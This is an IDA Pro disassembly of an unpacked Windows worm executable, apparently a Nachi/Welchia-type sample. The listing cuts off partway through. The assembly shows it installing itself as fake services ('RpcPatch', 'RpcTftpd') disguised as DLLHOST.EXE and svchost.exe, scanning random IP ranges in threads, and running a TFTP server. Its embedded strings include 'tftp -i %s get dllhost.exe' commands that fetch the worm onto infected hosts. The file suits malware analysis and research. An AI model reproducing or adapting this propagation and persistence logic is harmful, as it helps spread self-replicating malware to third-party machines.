;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : BC2E11A8024FC15B18E0EC5D5C5D98C4
; File Name : u:\work\bc2e11a8024fc15b18e0ec5d5c5d98c4_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00006000 ( 24576.)
; Section size in file : 00006000 ( 24576.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
seg000 segment para public 'CODE' use32
assume cs:seg000
;org 401000h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_402A00+D�p
var_230 = dword ptr -230h
var_22C = byte ptr -22Ch
var_228 = dword ptr -228h
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
var_107 = byte ptr -107h
arg_0 = dword ptr 4
sub esp, 230h
push ebp
push esi
push edi
mov ecx, 41h
xor eax, eax
lea edi, [esp+23Ch+var_107]
mov [esp+23Ch+var_108], 0
lea edx, [esp+23Ch+var_108]
rep stosd
mov edi, [esp+23Ch+arg_0]
or ecx, 0FFFFFFFFh
repne scasb
not ecx
sub edi, ecx
mov [esp+23Ch+var_230], 0
mov eax, ecx
mov esi, edi
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
xor eax, eax
and ecx, 3
push eax
rep movsb
mov ecx, 49h
lea edi, [esp+240h+var_22C]
rep stosd
push 2
call sub_403134 ; CreateToolhelp32Snapshot
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_4010E7
lea ecx, [esp+23Ch+var_230]
mov [esp+23Ch+var_230], 128h
push ecx
push edi
call sub_40312E ; Process32First
test eax, eax
jz short loc_4010E0
mov esi, dword_404120
mov ebp, dword_404140
loc_401091: ; CODE XREF: sub_401000+C9�j
lea edx, [esp+23Ch+var_20C]
push 2Eh
push edx
call esi ; dword_404120
add esp, 8
test eax, eax
jz short loc_4010A4
mov byte ptr [eax], 0
loc_4010A4: ; CODE XREF: sub_401000+9F�j
lea eax, [esp+23Ch+var_108]
lea ecx, [esp+23Ch+var_20C]
push eax
push ecx
call ebp ; dword_404140
add esp, 8
test eax, eax
jz short loc_4010CB
lea edx, [esp+23Ch+var_230]
push edx
push edi
call sub_403128 ; Process32Next
test eax, eax
jz short loc_4010E0
jmp short loc_401091
; ---------------------------------------------------------------------------
loc_4010CB: ; CODE XREF: sub_401000+B8�j
push edi
call dword_4040E0 ; CloseHandle
mov eax, [esp+23Ch+var_228]
pop edi
pop esi
pop ebp
add esp, 230h
retn
; ---------------------------------------------------------------------------
loc_4010E0: ; CODE XREF: sub_401000+83�j
; sub_401000+C7�j
push edi
call dword_4040E0 ; CloseHandle
loc_4010E7: ; CODE XREF: sub_401000+6C�j
pop edi
pop esi
xor eax, eax
pop ebp
add esp, 230h
retn
sub_401000 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401100 proc near ; CODE XREF: sub_401470+38�p
var_2 = byte ptr -2
var_1 = byte ptr -1
push ecx
push ebx
push esi
mov esi, dword_40413C
call esi ; dword_40413C
cdq
mov ecx, 11h
idiv ecx
cmp edx, 0Eh
jnz short loc_40112E
call esi ; dword_40413C
mov ebx, eax
and ebx, 80000003h
jns short loc_401129
dec ebx
or ebx, 0FFFFFFFCh
inc ebx
loc_401129: ; CODE XREF: sub_401100+22�j
add bl, 3Fh
jmp short loc_401160
; ---------------------------------------------------------------------------
loc_40112E: ; CODE XREF: sub_401100+16�j
cmp edx, 0Fh
jnz short loc_401144
call esi ; dword_40413C
cdq
mov ecx, 2Dh
idiv ecx
mov ebx, edx
add bl, 80h
jmp short loc_401160
; ---------------------------------------------------------------------------
loc_401144: ; CODE XREF: sub_401100+31�j
cmp edx, 10h
jnz short loc_40115A
call esi ; dword_40413C
cdq
mov ecx, 9
idiv ecx
mov ebx, edx
sub bl, 40h
jmp short loc_401160
; ---------------------------------------------------------------------------
loc_40115A: ; CODE XREF: sub_401100+47�j
mov bl, byte_405BA4[edx]
loc_401160: ; CODE XREF: sub_401100+2C�j
; sub_401100+42�j ...
call esi ; dword_40413C
and eax, 800000FFh
jns short loc_401170
dec eax
or eax, 0FFFFFF00h
inc eax
loc_401170: ; CODE XREF: sub_401100+67�j
mov [esp+0Ch+var_2], al
call esi ; dword_40413C
and eax, 800000FFh
jns short loc_401184
dec eax
or eax, 0FFFFFF00h
inc eax
loc_401184: ; CODE XREF: sub_401100+7B�j
mov [esp+0Ch+var_1], al
call esi ; dword_40413C
and eax, 800000FFh
jns short loc_401198
dec eax
or eax, 0FFFFFF00h
inc eax
loc_401198: ; CODE XREF: sub_401100+8F�j
xor edx, edx
xor ecx, ecx
mov ch, [esp+0Ch+var_1]
mov dh, bl
mov dl, [esp+0Ch+var_2]
and eax, 0FFh
shl edx, 10h
or eax, edx
and ecx, 0FFFFh
pop esi
or eax, ecx
pop ebx
pop ecx
retn
sub_401100 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4011C0 proc near ; CODE XREF: seg000:004030AA�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
call dword_4040CC ; FreeConsole
call sub_4027B0
test eax, eax
jnz short locret_4011FB
push 104h
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
call dword_4040D0 ; GetSystemDirectoryA
call sub_402730
sub eax, 2
jz short loc_4011FC
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push eax
push ecx
call sub_4016D0
add esp, 8
locret_4011FB: ; CODE XREF: sub_4011C0+D�j
retn
; ---------------------------------------------------------------------------
loc_4011FC: ; CODE XREF: sub_4011C0+27�j
jmp sub_4027E0
sub_4011C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401210 proc near ; CODE XREF: sub_401280+AF�p
; sub_401280:loc_4013B1�p ...
push esi
mov esi, dword_4040C8
loc_401217: ; CODE XREF: sub_401210+27�j
call sub_401E80
test eax, eax
jnz short loc_401230
loc_401220: ; CODE XREF: sub_401210+1E�j
push 927C0h
call esi ; dword_4040C8
call sub_401E80
test eax, eax
jz short loc_401220
loc_401230: ; CODE XREF: sub_401210+E�j
call sub_401EA0
test eax, eax
jz short loc_401217
mov esi, dword_40411C
push offset dword_407478
push offset aTftpISGetDllho ; "tftp -i %s get dllhost.exe wins\\DLLHOST"...
push offset dword_4075A8
call esi ; dword_40411C
add esp, 0Ch
push offset dword_407478
push offset aTftpISGetSvcho ; "tftp -i %s get svchost.exe wins\\SVCHOST"...
push offset dword_407628
call esi ; dword_40411C
add esp, 0Ch
call sub_4020E0
call sub_402130
pop esi
retn
sub_401210 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401280 proc near ; CODE XREF: sub_4016D0+A�j
; seg000:0040294F�p
var_1A0 = word ptr -1A0h
var_194 = byte ptr -194h
var_190 = byte ptr -190h
sub esp, 1A4h
lea eax, [esp+1A4h+var_190]
push eax
push 202h
call dword_40418C ; WSAStartup
test eax, eax
jnz loc_401359
call sub_402A00
lea ecx, [esp+1A4h+var_1A0]
push ecx
call dword_4040B8 ; GetLocalTime
cmp [esp+1A4h+var_1A0], 7D4h
jnz short loc_4012DB
push offset aRpcpatch ; "RpcPatch"
call sub_402F00
push offset aRpctftpd ; "RpcTftpd"
call sub_402F00
add esp, 8
call sub_402970
push 1
call dword_4040BC ; ExitProcess
loc_4012DB: ; CODE XREF: sub_401280+35�j
push ebx
push ebp
push esi
push edi
call dword_4040C0 ; GetTickCount
push eax
call dword_404104 ; srand
mov esi, dword_4040C8
mov ecx, 10h
mov eax, 0AAAAAAAAh
mov edi, offset dword_406430
add esp, 4
rep stosd
loc_401306: ; CODE XREF: sub_401280+A3�j
push 109A0h
call sub_402FC0
add esp, 4
mov ds:dword_4075A0, eax
push 64h
call esi ; dword_4040C8
mov eax, ds:dword_4075A0
test eax, eax
jz short loc_401306
call sub_401F30
call sub_402170
call sub_401210
call sub_401780
lea edx, [esp+1A4h+var_194]
push edx
push 0
push 0
push offset sub_401990
push 0
push 0
call dword_4040C4 ; CreateThread
test eax, eax
jnz short loc_401360
pop edi
pop esi
pop ebp
pop ebx
loc_401359: ; CODE XREF: sub_401280+18�j
add esp, 1A4h
retn
; ---------------------------------------------------------------------------
loc_401360: ; CODE XREF: sub_401280+D3�j
push eax
call dword_4040E0 ; CloseHandle
push offset aRpctftpd ; "RpcTftpd"
call sub_402540
add esp, 4
test eax, eax
jnz short loc_401398
push 3E8h
call esi ; dword_4040C8
call sub_4015E0
push 3E8h
call esi ; dword_4040C8
push offset aRpctftpd ; "RpcTftpd"
call sub_402540
add esp, 4
loc_401398: ; CODE XREF: sub_401280+F6�j
push 7D0h
call esi ; dword_4040C8
mov ebx, dword_404190
mov ebp, dword_404194
mov edi, dword_40413C
loc_4013B1: ; CODE XREF: sub_401280+1DE�j
call sub_401210
push offset dword_407478
call ebp ; dword_404194
push eax
call ebx ; dword_404190
mov esi, eax
push 0
and esi, 0FFFF0000h
push 0
push 1
push esi
call sub_401470
add esp, 10h
call sub_401210
call edi ; dword_40413C
and eax, 80000001h
jns short loc_4013EA
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_4013EA: ; CODE XREF: sub_401280+163�j
jz short loc_4013F4
add esi, 10000h
jmp short loc_4013FA
; ---------------------------------------------------------------------------
loc_4013F4: ; CODE XREF: sub_401280:loc_4013EA�j
sub esi, 30000h
loc_4013FA: ; CODE XREF: sub_401280+172�j
push 0
push 0
push 3
push esi
call sub_401470
call sub_401210
call edi ; dword_40413C
cdq
mov ecx, 4Ch
xor esi, esi
idiv ecx
push 1
push 0
push 1
mov si, word_40537C[edx*2]
shl esi, 10h
push esi
call sub_401470
add esp, 20h
call sub_401210
call edi ; dword_40413C
and eax, 80000001h
jns short loc_401444
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_401444: ; CODE XREF: sub_401280+1BD�j
jz short loc_40144A
push 0
jmp short loc_40144C
; ---------------------------------------------------------------------------
loc_40144A: ; CODE XREF: sub_401280:loc_401444�j
push 1
loc_40144C: ; CODE XREF: sub_401280+1C8�j
push 1
push 1
push esi
call sub_401470
add esp, 10h
call sub_402A00
jmp loc_4013B1
sub_401280 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401470 proc near ; CODE XREF: sub_401280+14F�p
; sub_401280+181�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
sub esp, 0Ch
push ebx
push ebp
mov ebp, dword_4040C8
push esi
mov esi, [esp+18h+arg_4]
push edi
shl esi, 10h
xor edi, edi
xor ebx, ebx
test esi, esi
mov [esp+1Ch+var_8], 1
mov [esp+1Ch+var_C], ebx
mov [esp+1Ch+var_4], esi
jle loc_4015C7
loc_4014A0: ; CODE XREF: sub_401470+151�j
mov eax, [esp+1Ch+arg_8]
test eax, eax
jz short loc_4014B1
call sub_401100
mov ebx, eax
jmp short loc_4014B7
; ---------------------------------------------------------------------------
loc_4014B1: ; CODE XREF: sub_401470+36�j
mov eax, [esp+1Ch+arg_0]
add ebx, eax
loc_4014B7: ; CODE XREF: sub_401470+3F�j
cmp bl, 0C5h
jz loc_4015B6
mov ecx, ebx
shr ecx, 8
cmp cl, 0C5h
jz loc_4015B6
mov eax, ebx
shr eax, 10h
cmp al, 0C5h
jz loc_4015B6
mov edx, ebx
shr edx, 18h
cmp dl, 0C5h
jz loc_4015B6
cmp bx, 9999h
jz loc_4015B6
cmp cx, 9999h
jz loc_4015B6
cmp ax, 9999h
jz loc_4015B6
push 4
call sub_402FC0
mov esi, eax
add esp, 4
test esi, esi
jnz short loc_40152D
push 64h
call ebp ; dword_4040C8
push 4
call sub_402FC0
mov esi, eax
add esp, 4
test esi, esi
jz short loc_401575
loc_40152D: ; CODE XREF: sub_401470+A7�j
test edi, edi
jz short loc_401538
push edi
call dword_4040E0 ; CloseHandle
loc_401538: ; CODE XREF: sub_401470+BF�j
push ebx
call dword_404188 ; ntohl
mov [esi], eax
mov eax, [esp+1Ch+arg_C]
test eax, eax
jz short loc_401558
lea eax, [esp+1Ch+arg_4]
push eax
push 0
push esi
push offset sub_402C40
jmp short loc_401565
; ---------------------------------------------------------------------------
loc_401558: ; CODE XREF: sub_401470+D7�j
lea ecx, [esp+1Ch+arg_4]
push ecx
push 0
push esi
push offset sub_402B20
loc_401565: ; CODE XREF: sub_401470+E6�j
push 0
push 0
call dword_4040C4 ; CreateThread
push 2
mov edi, eax
call ebp ; dword_4040C8
loc_401575: ; CODE XREF: sub_401470+BB�j
mov eax, [esp+1Ch+var_8]
test eax, eax
jz short loc_401596
cmp [esp+1Ch+var_C], 12Ch
jl short loc_401596
push 7D0h
call ebp ; dword_4040C8
mov [esp+1Ch+var_8], 0
loc_401596: ; CODE XREF: sub_401470+10B�j
; sub_401470+115�j
cmp ds:dword_4075A4, 12Ch
jl short loc_4015B2
loc_4015A2: ; CODE XREF: sub_401470+140�j
push 2
call ebp ; dword_4040C8
cmp ds:dword_4075A4, 12Ch
jge short loc_4015A2
loc_4015B2: ; CODE XREF: sub_401470+130�j
mov esi, [esp+1Ch+var_4]
loc_4015B6: ; CODE XREF: sub_401470+4A�j
; sub_401470+58�j ...
mov ebx, [esp+1Ch+var_C]
inc ebx
cmp ebx, esi
mov [esp+1Ch+var_C], ebx
jl loc_4014A0
loc_4015C7: ; CODE XREF: sub_401470+2A�j
push 0EA60h
call ebp ; dword_4040C8
pop edi
pop esi
pop ebp
pop ebx
add esp, 0Ch
retn
sub_401470 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4015E0 proc near ; CODE XREF: sub_401280+FF�p
; sub_4016D0�p
var_208 = byte ptr -208h
var_104 = byte ptr -104h
sub esp, 208h
lea eax, [esp+208h+var_104]
push esi
mov esi, dword_40411C
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push offset aSDllcacheTftpd ; "%s\\dllcache\\tftpd.exe"
push eax
call esi ; dword_40411C
add esp, 0Ch
lea ecx, [esp+20Ch+var_208]
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push offset aSWinsSvchost_e ; "%s\\wins\\svchost.exe"
push ecx
call esi ; dword_40411C
add esp, 0Ch
lea edx, [esp+20Ch+var_208]
lea eax, [esp+20Ch+var_104]
push 0
push edx
push eax
call dword_4040B4 ; CopyFileA
push offset aMsdtc ; "MSDTC"
push offset aSvchost_exe ; "svchost.exe"
push offset aNetworkConnect ; "Network Connections Sharing"
push offset aRpctftpd ; "RpcTftpd"
call sub_4023E0
add esp, 10h
pop esi
add esp, 208h
retn
sub_4015E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401660 proc near ; CODE XREF: sub_4016D0+5�p
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
sub esp, 20Ch
lea eax, [esp+20Ch+var_108]
push 104h
push eax
push 0
call dword_4040A8 ; GetModuleFileNameA
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
lea ecx, [esp+210h+var_20C]
push offset aSWinsDllhost_e ; "%s\\wins\\DLLHOST.EXE"
push ecx
call dword_40411C ; sprintf
add esp, 0Ch
lea edx, [esp+20Ch+var_20C]
lea eax, [esp+20Ch+var_108]
push 0
push edx
push eax
call dword_4040B4 ; CopyFileA
push offset aBrowser ; "Browser"
push offset aDllhost_exe ; "DLLHOST.EXE"
push offset aWinsClient ; "WINS Client"
push offset aRpcpatch ; "RpcPatch"
call sub_4023E0
add esp, 21Ch
retn
sub_401660 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4016D0 proc near ; CODE XREF: sub_4011C0+33�p
call sub_4015E0
call sub_401660
jmp sub_401280
sub_4016D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4016E0 proc near ; CODE XREF: sub_401780:loc_4018BC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
push 0
push 0
push eax
push ecx
push 0
call sub_403110
neg eax
sbb eax, eax
inc eax
retn
sub_4016E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401700 proc near ; CODE XREF: sub_401780+16D�p
var_54 = dword ptr -54h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
arg_0 = dword ptr 4
sub esp, 54h
push edi
mov ecx, 11h
xor eax, eax
lea edi, [esp+58h+var_44]
rep stosd
lea ecx, [esp+58h+var_54]
lea edx, [esp+58h+var_44]
push ecx
mov ecx, [esp+5Ch+arg_0]
push edx
push eax
push eax
push eax
push eax
push eax
push eax
push ecx
push eax
mov [esp+80h+var_44], 44h
mov [esp+80h+var_40], eax
mov [esp+80h+var_38], eax
mov [esp+80h+var_3C], eax
mov [esp+80h+var_28], eax
mov [esp+80h+var_2C], eax
mov [esp+80h+var_30], eax
mov [esp+80h+var_34], eax
mov [esp+80h+var_14], ax
mov [esp+80h+var_10], eax
mov [esp+80h+var_12], ax
mov [esp+80h+var_18], 1
call dword_4040E4 ; CreateProcessA
mov ecx, [esp+58h+var_54]
pop edi
neg eax
sbb eax, eax
and eax, ecx
add esp, 54h
retn
sub_401700 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401780 proc near ; CODE XREF: sub_401280+B4�p
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = word ptr -0B8h
var_B6 = byte ptr -0B6h
var_B4 = byte ptr -0B4h
sub esp, 0C8h
push esi
push edi
call sub_402310
mov edi, eax
test edi, edi
jz short loc_40179C
cmp edi, 1
jnz loc_4018C8
loc_40179C: ; CODE XREF: sub_401780+11�j
push edi
call sub_402390
add esp, 4
test eax, eax
jnz loc_4018C8
call dword_4040A0 ; GetOEMCP
mov esi, eax
call dword_4040A4 ; GetSystemDefaultLCID
mov ecx, eax
and ecx, 3FFh
shr ax, 0Ah
cmp esi, 1B5h
jnz short loc_4017E7
cmp cx, 9
jnz loc_40192F
cmp ax, 1
jnz loc_40192F
xor eax, eax
jmp short loc_40185E
; ---------------------------------------------------------------------------
loc_4017E7: ; CODE XREF: sub_401780+4D�j
cmp esi, 3A8h
jnz short loc_40180A
cmp cx, 4
jnz loc_40192F
cmp ax, 2
jnz loc_40192F
mov eax, 1
jmp short loc_40185E
; ---------------------------------------------------------------------------
loc_40180A: ; CODE XREF: sub_401780+6D�j
cmp esi, 3B6h
jnz short loc_40182D
cmp cx, 4
jnz loc_40192F
cmp ax, 1
jnz loc_40192F
mov eax, 2
jmp short loc_40185E
; ---------------------------------------------------------------------------
loc_40182D: ; CODE XREF: sub_401780+90�j
cmp esi, 3A4h
jz loc_40192F
cmp esi, 3B5h
jnz loc_40192F
cmp cx, 12h
jnz loc_40192F
cmp ax, 1
jnz loc_40192F
mov eax, 3
loc_40185E: ; CODE XREF: sub_401780+65�j
; sub_401780+88�j ...
mov ecx, dword_4061A8
mov edx, dword_4061AC
mov [esp+0D0h+var_C8], ecx
mov ecx, dword_4061B0
mov [esp+0D0h+var_C4], edx
mov edx, dword_4061B4
mov [esp+0D0h+var_C0], ecx
mov cx, word_4061B8
mov [esp+0D0h+var_BC], edx
mov dl, byte_4061BA
test edi, edi
mov [esp+0D0h+var_B8], cx
mov [esp+0D0h+var_B6], dl
jnz short loc_4018AF
mov eax, off_405424[eax*4]
lea ecx, [esp+0D0h+var_C8]
push eax
push ecx
jmp short loc_4018BC
; ---------------------------------------------------------------------------
loc_4018AF: ; CODE XREF: sub_401780+11E�j
mov edx, off_405414[eax*4]
lea eax, [esp+0D0h+var_C8]
push edx
push eax
loc_4018BC: ; CODE XREF: sub_401780+12D�j
call sub_4016E0
add esp, 8
test eax, eax
jnz short loc_4018D3
loc_4018C8: ; CODE XREF: sub_401780+16�j
; sub_401780+27�j
pop edi
xor eax, eax
pop esi
add esp, 0C8h
retn
; ---------------------------------------------------------------------------
loc_4018D3: ; CODE XREF: sub_401780+146�j
lea ecx, [esp+0D0h+var_C8]
lea edx, [esp+0D0h+var_B4]
push ecx
push offset aSNOZQ ; "%s -n -o -z -q"
push edx
call dword_40411C ; sprintf
lea eax, [esp+0DCh+var_B4]
push eax
call sub_401700
mov esi, eax
add esp, 10h
test esi, esi
jnz short loc_401904
pop edi
pop esi
add esp, 0C8h
retn
; ---------------------------------------------------------------------------
loc_401904: ; CODE XREF: sub_401780+179�j
push 57E40h
push esi
call dword_4040B0 ; WaitForSingleObject
test eax, eax
jz short loc_40193A
push 1
push esi
call dword_4040AC ; TerminateProcess
push esi
call dword_4040E0 ; CloseHandle
lea ecx, [esp+0D0h+var_C8]
push ecx
call dword_4040E8 ; DeleteFileA
loc_40192F: ; CODE XREF: sub_401780+53�j
; sub_401780+5D�j ...
pop edi
xor eax, eax
pop esi
add esp, 0C8h
retn
; ---------------------------------------------------------------------------
loc_40193A: ; CODE XREF: sub_401780+192�j
push esi
call dword_4040E0 ; CloseHandle
mov esi, dword_4040C8
push 3A98h
call esi ; dword_4040C8
lea edx, [esp+0D0h+var_C8]
push edx
call dword_4040E8 ; DeleteFileA
push edi
call sub_402390
add esp, 4
test eax, eax
jz short loc_401977
push 2
call sub_4022A0
add esp, 4
push 4E20h
call esi ; dword_4040C8
loc_401977: ; CODE XREF: sub_401780+1E4�j
pop edi
mov eax, 1
pop esi
add esp, 0C8h
retn
sub_401780 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401990 proc near ; DATA XREF: sub_401280+C2�o
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = byte ptr -10h
sub esp, 28h
push ebx
push ebp
push esi
push edi
push 0
push 1
push 2
call dword_404150 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_401AFA
push 0
call dword_404188 ; ntohl
mov [esp+38h+var_20], 2
mov [esp+38h+var_1C], eax
call dword_40413C ; rand
cdq
mov ecx, 64h
mov ebx, dword_404174
idiv ecx
mov ebp, dword_404178
add edx, 29Ah
xor esi, esi
loc_4019E3: ; CODE XREF: sub_401990+8F�j
add dx, si
xor eax, eax
mov al, dh
mov word_405B68, dx
cmp al, 0C5h
jz short loc_401A18
cmp dl, 0C5h
jz short loc_401A18
push edx
call ebx ; dword_404174
lea ecx, [esp+38h+var_20]
push 10h
push ecx
push edi
mov [esp+44h+var_1E], ax
call ebp ; dword_404178
cmp eax, 0FFFFFFFFh
jnz short loc_401A21
mov dx, word_405B68
loc_401A18: ; CODE XREF: sub_401990+63�j
; sub_401990+68�j
inc esi
cmp esi, 3E8h
jl short loc_4019E3
loc_401A21: ; CODE XREF: sub_401990+7F�j
cmp esi, 3E8h
jnz short loc_401A37
call dword_40417C ; WSACleanup
push 1
call dword_4040BC ; ExitProcess
loc_401A37: ; CODE XREF: sub_401990+97�j
push 7D0h
push edi
call dword_404180 ; listen
cmp eax, 0FFFFFFFFh
jz loc_401AF3
lea edx, [esp+38h+var_28]
lea eax, [esp+38h+var_10]
push edx
push eax
push edi
mov [esp+44h+var_28], 10h
call dword_404184 ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_401AF3
mov ebp, dword_4040C8
mov ebx, dword_4040C4
loc_401A7C: ; CODE XREF: sub_401990+142�j
push 4
call sub_402FC0
add esp, 4
test eax, eax
jnz short loc_401A9C
push 0Ah
call ebp ; dword_4040C8
push 4
call sub_402FC0
add esp, 4
test eax, eax
jz short loc_401ABC
loc_401A9C: ; CODE XREF: sub_401990+F8�j
lea ecx, [esp+38h+var_24]
mov [eax], esi
push ecx
push 0
push eax
push offset sub_401C80
push 0
push 0
call ebx ; dword_4040C4
test eax, eax
jz short loc_401AE7
push eax
call dword_4040E0 ; CloseHandle
loc_401ABC: ; CODE XREF: sub_401990+10A�j
lea edx, [esp+38h+var_28]
lea eax, [esp+38h+var_10]
push edx
push eax
push edi
call dword_404184 ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_401A7C
push edi
call dword_404170 ; closesocket
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 28h
retn 4
; ---------------------------------------------------------------------------
loc_401AE7: ; CODE XREF: sub_401990+123�j
cmp esi, 0FFFFFFFFh
jz short loc_401AF3
push esi
call dword_404170 ; closesocket
loc_401AF3: ; CODE XREF: sub_401990+B6�j
; sub_401990+DA�j ...
push edi
call dword_404170 ; closesocket
loc_401AFA: ; CODE XREF: sub_401990+18�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 28h
retn 4
sub_401990 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401B10 proc near ; CODE XREF: sub_401C80+D8�p
; sub_401C80+121�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_4]
push ebx
push ebp
push esi
push edi
mov edi, edx
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
mov edi, [esp+10h+arg_0]
push 0
not ecx
dec ecx
push ecx
push edx
push edi
call dword_404168 ; send
test eax, eax
jnz short loc_401B3C
pop edi
pop esi
pop ebp
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401B3C: ; CODE XREF: sub_401B10+25�j
mov esi, [esp+10h+arg_8]
mov ebx, dword_40416C
push 0
push 3FFh
push esi
push edi
call ebx ; dword_40416C
cmp eax, 0FFFFFFFFh
jz short loc_401B7E
mov ebp, dword_404100
loc_401B5C: ; CODE XREF: sub_401B10+6C�j
push offset dword_4061BC
push esi
mov byte ptr [eax+esi], 0
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401B85
push eax
push 3FFh
push esi
push edi
call ebx ; dword_40416C
cmp eax, 0FFFFFFFFh
jnz short loc_401B5C
loc_401B7E: ; CODE XREF: sub_401B10+44�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401B85: ; CODE XREF: sub_401B10+5D�j
pop edi
pop esi
pop ebp
mov eax, 1
pop ebx
retn
sub_401B10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401B90 proc near ; CODE XREF: sub_401C80+162�p
; sub_401C80+192�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ecx
mov edx, [esp+4+arg_4]
push ebx
push ebp
push esi
push edi
mov edi, edx
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
mov esi, [esp+14h+arg_0]
push 0
not ecx
dec ecx
push ecx
push edx
push esi
call dword_404168 ; send
test eax, eax
jz loc_401C64
lea eax, [esp+14h+var_4]
push 4
push eax
push 1006h
push 0FFFFh
push esi
mov [esp+28h+var_4], 15F90h
call dword_404164 ; setsockopt
mov ebx, dword_4040C0
call ebx ; dword_4040C0
mov edi, [esp+14h+arg_8]
push 0
push 1FFh
push edi
push esi
mov [esp+24h+arg_4], eax
call dword_40416C ; recv
mov esi, eax
call ebx ; dword_4040C0
mov ecx, [esp+14h+arg_4]
mov ebp, eax
sub ebp, ecx
cmp esi, 0FFFFFFFFh
jz short loc_401C64
loc_401C0C: ; CODE XREF: sub_401B90+D2�j
mov byte ptr [esi+edi], 0
mov esi, dword_404100
push offset aTransferSucces ; "Transfer successful"
push edi
call esi ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401C6C
push offset aTimeoutOccurre ; "Timeout occurred"
push edi
call esi ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401C64
cmp ebp, 15F2Ch
ja short loc_401C64
call ebx ; dword_4040C0
mov ecx, [esp+14h+arg_0]
push 0
push 1FFh
push edi
push ecx
mov [esp+24h+arg_4], eax
call dword_40416C ; recv
mov esi, eax
call ebx ; dword_4040C0
sub eax, [esp+14h+arg_4]
add ebp, eax
cmp esi, 0FFFFFFFFh
jnz short loc_401C0C
loc_401C64: ; CODE XREF: sub_401B90+26�j
; sub_401B90+7A�j ...
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_401C6C: ; CODE XREF: sub_401B90+93�j
pop edi
pop esi
pop ebp
mov eax, 1
pop ebx
pop ecx
retn
sub_401B90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
